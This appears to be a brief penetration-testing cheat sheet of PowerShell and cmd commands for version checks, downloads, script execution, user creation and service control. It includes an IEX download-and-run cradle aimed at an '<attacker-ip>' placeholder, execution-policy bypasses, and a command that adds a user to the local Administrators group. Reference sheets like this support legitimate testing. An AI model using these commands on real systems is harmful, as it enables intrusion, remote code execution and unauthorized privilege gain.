#
PowerShell
#
Check Version
If the following command doesn't work, assume it's PowerShell 1.0 (the $PSVersionTable automatic variable only exists in 2.0 and later).
powershell -Command "$PSVersionTable.PSVersion"
#
Execution policy bypass
Start a PowerShell session with the execution policy set to Bypass (-ep is the short form of -ExecutionPolicy).
powershell -ep bypass
#
Downloading Files
In PowerShell 2.x:
powershell -Command '$WebClient = New-Object System.Net.WebClient;$WebClient.DownloadFile("http://10.0.0.1/path/to/file","C:\path\to\file")'
In PowerShell 3 and above:
powershell -Command 'Invoke-WebRequest -Uri "http://10.0.0.1/path/to/file" -OutFile "C:\path\to\file"'
#
Running PowerShell Scripts
powershell IEX(New-Object Net.Webclient).downloadstring('http://<attacker-ip>:<attacker-port>/script.ps1')
powershell -noexit -file "C:\path\to\script.ps1"
Bypassing the execution policy when running a script file
powershell -executionPolicy bypass -noexit -file "C:\path\to\script.ps1"
#
Adding users
net user /domain <username> <password>
net localgroup Administrators <username> /add # add a user to the local Administrators group
#
Services
powershell -c Get-Service # list all services
sc stop theservice # stop service (from cmd; inside a PowerShell session use sc.exe, since bare sc resolves to the Set-Content alias)
sc start theservice # start service